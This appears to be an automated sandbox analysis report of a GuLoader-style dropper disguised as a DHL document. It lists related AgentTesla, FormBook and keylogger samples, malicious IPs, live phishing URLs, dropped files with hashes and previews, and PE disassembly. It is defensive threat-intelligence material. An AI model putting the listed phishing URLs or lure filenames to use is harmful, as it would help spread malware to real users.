	Catalina - Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.BackDoor.SpyBotNET.62.13095.12836.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	rARKMONEY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	Fordybendes.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Po#70831.exe	Get hash	malicious	Azorult	Browse	172.67.128.117
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	162.159.130.233
VIRPUS	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.153.208.178
	https://ellenlightning.slickplan.com/wa4vxper/content/svgx2f4srvbqeat19e7?language=en_US	Get hash	malicious	HTMLPhisher	Browse	104.153.208.178
	5oBtUcfYbD.elf	Get hash	malicious	Mirai, Moobot	Browse	50.115.175.126
	YMloXummt3.elf	Get hash	malicious	Moobot	Browse	5.226.170.36
	https://click.pstmrk.it/3s/bfsdqbhdfqsbhdf.blogspot.com%2F/lvid/EsqzAQ/AQ/3d6bdb2c-8ba6-4238-a213-e9cee32f03d6/2/EhSnAlFZDV#cl/210168_smd/274/3553163/3122/3317/328533	Get hash	malicious	Unknown	Browse	50.115.172.236
	http://9k1.lawstore.me/?dD1jJmQ9MjIwMjUmbD01NDIzJmM9MTU5ODA5JmF1PTA=	Get hash	malicious	Phisher	Browse	50.115.174.138
	http://i84.lawstore.me/?dD1jJmQ9MjIwNDImbD01NDE2JmM9MTUxNDkmYXU9MA==	Get hash	malicious	Phisher	Browse	50.115.174.138
	Invoices.xls	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254
	Invoices.exe	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254
	SecuriteInfo.com.NSIS.Injector.SPOW.tr.7679.1853.exe	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	104.26.12.205
	Great Wall Motor Sale Bank_Sift_Copy.Pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	https://paquete.centrodelvaquero.com/	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	104.26.12.205
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll	IMG_000071TRIAL_ORDER_CFILE.exe	Get hash	malicious	FormBook, GuLoader	Browse
	IMG_000071TRIAL_ORDER_CFILE.exe	Get hash	malicious	GuLoader	Browse
	Group roominglist.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Group roominglist.exe	Get hash	malicious	GuLoader	Browse
	Group Deposit.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Group Deposit.exe	Get hash	malicious	GuLoader	Browse
	6nniXDa5J9.exe	Get hash	malicious	GuLoader	Browse
	6nniXDa5J9.exe	Get hash	malicious	GuLoader	Browse
	d8zSKMz5AH.rtf	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll	IMG_000071TRIAL_ORDER_CFILE.exe	Get hash	malicious	FormBook, GuLoader	Browse
	IMG_000071TRIAL_ORDER_CFILE.exe	Get hash	malicious	GuLoader	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	334427.exe	Get hash	malicious	GuLoader	Browse
	334427.exe	Get hash	malicious	GuLoader	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Flashs134.Bli

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	data
Category:	dropped
Size (bytes):	323255
Entropy (8bit):	7.545887168406348
Encrypted:	false
SSDEEP:	6144:XKVxIfOx4Up06IQNw2v0Zg5Y5YWZktpJBHxv6B8+Pb:6Vu3QNIZg5Y56vJBHxE8k
MD5:	84D6A705BCAD29B3CC47B66ED0F81EA3
SHA1:	976253E495D0324DE4A837365D740D384D80FB21
SHA-256:	AB5B6D6E2237B61592466C07C66880821A55727E93A5D5E7CAF459B3FB9FA602
SHA-512:	46D0B74D38BC5013C92EFD31F0ED529DCF503E10FBB75AA6376205D023C10DDD7DEAD1C584D5A2BAF5B3AD0E4AFAD47C6EBEEF2BE7EB4786DDE399E2F9357A90
Malicious:	false
Reputation:	low
Preview:	..........H...q...ww.............................................66.&.g.n......^^...............++++...II..........z.b.............^....Q..................$.........................V..!.......a...d....................~~~.....{.&&.........................Q..........................EE....SS....zzzz........x.u....Q.ll........."..........................YY..........W...........DD.uu.[...........eee..II............l...X....++++++....qq...........................::..............^.55........<................WW.y....\|..................................UU...........................((.......x......999.k..................4.... .......................3........................................!.FF..............J.`............MM.*........,..LLL.ff........>....7.........................................N..0......M.s............jj.................XX.....EE.............................GG...\|................................>>>....GG...........$......0......!.....111.......Y.>.........JJJJJ.................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Prelectured.sma

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	119364
Entropy (8bit):	2.6718604457702266
Encrypted:	false
SSDEEP:	1536:je3LoloPxvDElEmo6NqwxO/ET2LhQhu/RKnVPcT/kUHxd:lhCH+78H7
MD5:	F4A5EE7E8AE9859033386974B2CAAF21
SHA1:	16CF3E84E55407F66E95291B8AE019C01354763D
SHA-256:	F358CCA593B5C1AE9E48B638B8C7ECEE26EAE326FD21C453068996CFC56CDA48
SHA-512:	A6086B90FF5E5C1D545D0E7C3E11C5A7FD89A257BE90F65FD2E1871618995EB51843A5FD8A4286011A08DB8245A159D8E1DC7D46A4E50A6A63BC1A100259A475
Malicious:	false
Reputation:	low
Preview:	0000D4006800060000ECEC005A5A0000000000370000710000DDDDDD0000C6C6009300CACACACA00001600000000BDBDBDBD00B9B900000000A1A1A100610088000000008B00FEFE00BEBE00000000000000E6E6008A8A00000084848484005700004343430000000000464646007777770000000000003D3D000000005100000000CECE00000000B3B3002A001100009696969600EFEFEFEFEFEFEFEFEF0000FE00000000A8A8A80000004848008B8B8B8B8B8B8B8B00DD002C00000059002A2A007800620000585858000000000000050505050000D0D0D0000000008E8E8E8E00F3000000858500000000C300003D0000004A002B00A1A1A1A10000808000606000B3000033330000888888880000F8F800CFCFCF002100100000A6004200C70000000C0C000000004D4D000088880099000000530000C5003200E0E000C6C6C6C60000000000D2000F0F004A4A4A00330071710000B800007F00000080009E0000808080000000A200555500000000005F5F0000000000000000000000000000CD000000004200000000D4D4D40000009D9D9D0000858500C2000000340000009B9B00F30000191919190000B200009A001A0000000000ADADAD00000000979797000000C90000FAFA000000000D00040024242424000000610000009E9E9E9E00585858585800970000FD0000BBBBBBBBBB

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\Sber.txt

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	4.2745958598753875
Encrypted:	false
SSDEEP:	12:PuoLi5hEScE7GtCAx3xD879eOefQigajRaAq7BqTDwEq4:2oG5CS17GtDxB8BedBhjMAqNODh
MD5:	FB02EC3717A94D29AF3D0AD98450C2DC
SHA1:	633A8E051D7470C2197E17A1A35ACF191D4E09C1
SHA-256:	4942327C34401AF45DC4358B97F57162630A13CC616300F16D2A74BA50BAE83B
SHA-512:	098EFD8A7E70D23BF2784782E61AB359CF896081A2E82A61488977FACFF89D4C42CFFDD64763B8529397EBBB5DD39E4669E5103A87E5E9DA0D6451D69917DD7E
Malicious:	false
Reputation:	low
Preview:	gingerin velgrendes abye frstebehandling medaljernes heins approbator.blunderful hngekje indenrigsministeriums behovsdefinition ossie,loyaliteterne binaries diskretionshensyn farveskalaernes bibeskftigelse scrawniness ministrike crossties indexed selvovervurderingen stevnsboer..nonsustenance kodesekvensers tecnoctonia kunstvrkers endepunktets sexappeal scratchweed octaval fascismes hardin oxyphonia genskabning leveattest..hjulskruer staphylorrhaphies rulningerne blgebevgelser plagiarisms,subtrochleariform arbejdssgningers strstedelene reinforced mythopeic hstende filantrop mitsumata objectionableness tamponade abortlovgivning scorchers manslayers..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\foregahger.luf

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 633825300114114700748351602688.000000
Category:	dropped
Size (bytes):	469246
Entropy (8bit):	1.2546503643807034
Encrypted:	false
SSDEEP:	1536:gNlu1wJYkowzGi1M2aEmonX42/xUIB3HPG6/tWp0R:u5jzGiwE5fL9Heyq
MD5:	10D8F1FD0918D6C476FF604D2C5F4465
SHA1:	97F0C46CB5431E0DA6FD608B293ED1743AC0E24E
SHA-256:	FF3FAEFB975B108BE6608610BFDD9965B3C3DC72B397048FF2F1B31952FF10A1
SHA-512:	843E48813E18047413DA0C81F7116A180BDD61CFAC0B05E7BD98492BCBB1CB0ADACE4DDA2557D791BE2A4F040210D7B62C6B94F066254074B74D5CFADAB6B3CE
Malicious:	false
Reputation:	low
Preview:	1.............\...........................A.......R........K..}................................................................k...............................................;.......................................~....................................................................................@........................K............................1............\..........................................G..............................................w..........\...........................................J......................8.................W......................>.*......................7......M............................}..........K......,..........................................................\|i.............F.................................................k........O.....P.........i..............................................T...................................................................\|................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\merskumspibers.gha

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	data
Category:	dropped
Size (bytes):	494046
Entropy (8bit):	1.2584065451759774
Encrypted:	false
SSDEEP:	1536:c5fWsFOPlxRovk2kW9vuPmTgWv6Y9o4lWwpMMTr:cOxd5VPmTg0FWWTr
MD5:	D9F3FD1BC763A4D624EDC17866215411
SHA1:	5AFDB453C6FE0FFCFDEE93DA52D0BA14A549B968
SHA-256:	4B19F668682E689EB04E1660E7D460EC930AFB02B9575B08DD4F7DFAFBE80CB3
SHA-512:	199DFC75D0833CC5E0CC9C3DD7A657C977E231D04B0469D5D4F61F2FDDE68251FAB265075F697FD4DF8C38BBF22207E0AF41C6EBD201999FBFC31D2F04243E6A
Malicious:	false
Preview:	.............................a.....o..........................................................................@........................................w............................{............G..............................................n......................................................8................E.......C.............................................c.................................................................................R........?....................>.....P....o.................................................................................4....................................z.............'..............5......../....................................................................................3.........3..................f........(...................o.........P........2..................~...................................................................................................4.......+.......y.....................................................G..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage\standardiseringers.ulo

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	data
Category:	dropped
Size (bytes):	429377
Entropy (8bit):	1.2599194991036493
Encrypted:	false
SSDEEP:	768:VVF0SYjksWsqDFm3w3YVTMW98+6IUcs2unwOcyJFsShTRrcDQX+zAW07zLMDlRcK:aiRYCGccIyQHR8g9mPok0rJWSLAkBGsw
MD5:	E7BA44668E47A459499CB825D5DB2C9B
SHA1:	CB583A51F7E1172C60CF74D40FC84504EB3A2B30
SHA-256:	E33D80912DBE44DF9047FEDD640217600F651B2048DE82EBE7256C2B5BB717CF
SHA-512:	E342A0A0B63928A962DB8A65E5028A7FBEFE4D88B825870436ACED951110F04B77FBEB2AC0DD52153A6A175123A8D875DDB208204715B81395B3C699608882DC
Malicious:	false
Preview:	.......a.................R................................................................................................I......................!..............................................)..................................E.....P........................a............................H...\....................u.......................H..............4..........M..........................................................................b.......6.................................._...^..........4.............T....................i......1................................................/....................\|......A..................... .............................T...............rQ.............................y...................(V..............................................................................9.......... .....f............y................G.......................................................V..........<5.........j...........................................Y..........*....

C:\Users\user\AppData\Local\Temp\nsm38B1.tmp

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	1879665
Entropy (8bit):	3.1562077804085447
Encrypted:	false
SSDEEP:	12288:8wwP7KVu3QNIZg5Y56vJBHxE8hCI8HS2J9Am:SO6QNIKLDx/mJ9l
MD5:	7AB7159A6E7314A2608D56494BC42D56
SHA1:	5632CAA035439F5F938D32BA47FE20665275B040
SHA-256:	E109CE6C9AF455A7BC6D3072C874B8A1BB6C9E13AA2F5CD453D9878A3EA94A59
SHA-512:	AF4B3937812872255CBF6E60029300B3B5DCD80A61B56C1097C69F2BE29CB30C357E3345583664788C05D04900AA23BE46A421A0607AE4F826C1B8A250EC64AD
Malicious:	false
Preview:	.f......,........................B......<e.......f..........................................................................................................................................................................................................................................G...[...............j...............................................................................................................................m...............................................................(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.8155439565923523
Encrypted:	false
SSDEEP:	48:S46+/fTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mjsofjLl:zRuPbOBtWZBV8jAWiAJCdv2Cmj/L
MD5:	F1E9EED02DB3A822A7DDEF0C724E5F1F
SHA1:	65864992F5B6C79C5EFBEFB5B1354648A8A86709
SHA-256:	6DFF504C6759C418C6635C9B25B8C91D0D9EF7787A3A93610D7670BB563C09DF
SHA-512:	C22B64FFF76B25CF53231B8636F07B361D95791C4646787CE7BEAC27AD6A0DE88337DCCEB25B5196F97C452DDA72E2614647F51A8A18CB4D5228A82ED2E0780C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse Filename: Group roominglist.exe, Detection: malicious, Browse Filename: Group roominglist.exe, Detection: malicious, Browse Filename: Group Deposit.exe, Detection: malicious, Browse Filename: Group Deposit.exe, Detection: malicious, Browse Filename: 6nniXDa5J9.exe, Detection: malicious, Browse Filename: 6nniXDa5J9.exe, Detection: malicious, Browse Filename: d8zSKMz5AH.rtf, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....MX...........!........."......?........ ...............................p......................................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.656065698421856
Encrypted:	false
SSDEEP:	192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
MD5:	17ED1C86BD67E78ADE4712BE48A7D2BD
SHA1:	1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
SHA-256:	BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
SHA-512:	0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: 334427.exe, Detection: malicious, Browse Filename: 334427.exe, Detection: malicious, Browse Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\Milliluxes.lnk

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	966
Entropy (8bit):	3.3304475663195983
Encrypted:	false
SSDEEP:	24:8q/BTDHoY7lLYXE+mDuILP8izZMKt2bIJT:8mhDB7lLYqDuILUiNMKtEaT
MD5:	B64C989278CF77931116021426CD1705
SHA1:	2A8932000438062EAC6459613AEAB82EB55CFFDE
SHA-256:	A7D39EB2DF56F911566CE3C5DE6C74584AA05DB8DB00697ABD3CB6E373B9E301
SHA-512:	A465BC18BF67E535753A7ED01444DA3903A80A3197D81E735E4BE0B81665B7A2DB01E07CEB994959C3C276DACA7DAEFA413AF767B30420FC3E11440FE35D123B
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....V.1...........vlgerne.@............................................v.l.g.e.r.n.e.....z.2...........construction.Bes231.X............................................c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1..."...2.....\.....\.....\.W.i.n.d.o.w.s.\.F.o.n.t.s.\.v.l.g.e.r.n.e.\.c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.z.o.n.i.t.o.i.d.e.s.\.s.u.e.v.e.\.n.d.s.a.g.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

C:\Users\Public\Pictures\Milliluxes.lnk

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	966
Entropy (8bit):	3.3304475663195983
Encrypted:	false
SSDEEP:	24:8q/BTDHoY7lLYXE+mDuILP8izZMKt2bIJT:8mhDB7lLYqDuILUiNMKtEaT
MD5:	B64C989278CF77931116021426CD1705
SHA1:	2A8932000438062EAC6459613AEAB82EB55CFFDE
SHA-256:	A7D39EB2DF56F911566CE3C5DE6C74584AA05DB8DB00697ABD3CB6E373B9E301
SHA-512:	A465BC18BF67E535753A7ED01444DA3903A80A3197D81E735E4BE0B81665B7A2DB01E07CEB994959C3C276DACA7DAEFA413AF767B30420FC3E11440FE35D123B
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....V.1...........vlgerne.@............................................v.l.g.e.r.n.e.....z.2...........construction.Bes231.X............................................c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1..."...2.....\.....\.....\.W.i.n.d.o.w.s.\.F.o.n.t.s.\.v.l.g.e.r.n.e.\.c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.z.o.n.i.t.o.i.d.e.s.\.s.u.e.v.e.\.n.d.s.a.g.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

C:\Windows\SysWOW64\Dogmefastes.lnk

Download File

Process:	C:\Users\user\Desktop\DHL Page1.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1260
Entropy (8bit):	3.1709256470442693
Encrypted:	false
SSDEEP:	12:8wl0ysXUCV/tz+7RafgKDYWKJpOelwWrhQ1zt6wWnIQ1olfW+kjcmA6ciKg/rNJG:85raRMgKVK2ZLdkizZMK45HALJT
MD5:	3F64CCF6FFEFD40D1D5E387E17C194BF
SHA1:	024C41EC4E36FB476E15B3E001727F8F4E738505
SHA-256:	38C2554E98A09DA762D45388519A201AEC4849206F3966F30B0CC634F5DBA19F
SHA-512:	A69EB3C48C3D07BAE4871DD3911186B98FC996FDBA6FD3B10C3977134C9A58C593A5F834E160BA220FD9AE56427A6763B6BCFBA7E937D3B4F4AB256EEEA09FA8
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....r.1...........uddannelsesfiler..R............................................u.d.d.a.n.n.e.l.s.e.s.f.i.l.e.r... .l.2...........Maaneraket.uds..N............................................M.a.a.n.e.r.a.k.e.t...u.d.s.......E.....\.....\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.u.d.d.a.n.n.e.l.s.e.s.f.i.l.e.r.\.M.a.a.n.e.r.a.k.e.t...u.d.s.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.629212621346839
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL Page1.exe
File size:	909'168 bytes
MD5:	e563153089b05a25e30db0a73e196b10
SHA1:	fb098be6dc900c18c83b53681cc0fd2c976fe638
SHA256:	dbd76943d4c2efa432805b8458e970c2b6c6d76c16ff4d2a7d63df50ad0330af
SHA512:	17e30159b45bfcdd51060402035df22aac990462f2cd6030d5a706365334324972516beb206e061250f22bea6d5c559c2f607bf47742612dcae03f909c959b0d
SSDEEP:	24576:eJi2vF8oJn4gGSBy/65Sq+6tOhMAP63ACF25:eh8oF/G//6c6+MAP6bW
TLSH:	7A15EF907DE4B46FF1E1CA3D4A96841F1A872E1B5AF08F4FB25DBBCA26701434C96358
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L...F.MX.................f..........l4............@

File Icon


Icon Hash:	0bd9d964726e211f

Static PE Info

General

Entrypoint:	0x40346c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA46 [Sun Dec 11 21:51:02 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ea4df5d94204fc550be1874e1b77ea7

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Overdepends Desertification Jinked ", O=Crappo, L=Veitsbronn, S=Bayern, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	14/09/2023 09:05:14 13/09/2026 09:05:14
Subject Chain	CN="Overdepends Desertification Jinked ", O=Crappo, L=Veitsbronn, S=Bayern, C=DE
Version:	3
Thumbprint MD5:	6EAB2E96B6451EEAD5EC98AEBBC51F69
Thumbprint SHA-1:	04B4609FD50473998E5EF2496F1F8ED25531D5CD
Thumbprint SHA-256:	4D4B0CAF16F20FD81B1F814A84F7F6409CB375BEDE279A0DC10EAB6BB3AB595D
Serial:	66D66CF9023599E17F142E57C673717975E72549

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FB34D09C153h
push ebx
call 00007FB34D09F2ACh
cmp eax, ebx
je 00007FB34D09C149h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007FB34D09F226h
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FB34D09C12Ch
push ebp
push 00000009h
call 00007FB34D09F27Eh
push 00000007h
call 00007FB34D09F277h
mov dword ptr [00434F24h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [00434FD8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B248h
call dword ptr [00408188h]
push 0040A384h
push 00433F20h
call 00007FB34D09EE60h
call dword ptr [004080ACh]
mov ebp, 00440000h
push eax
push ebp
call 00007FB34D09EE4Eh
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x428f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xdcc80	0x12f0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
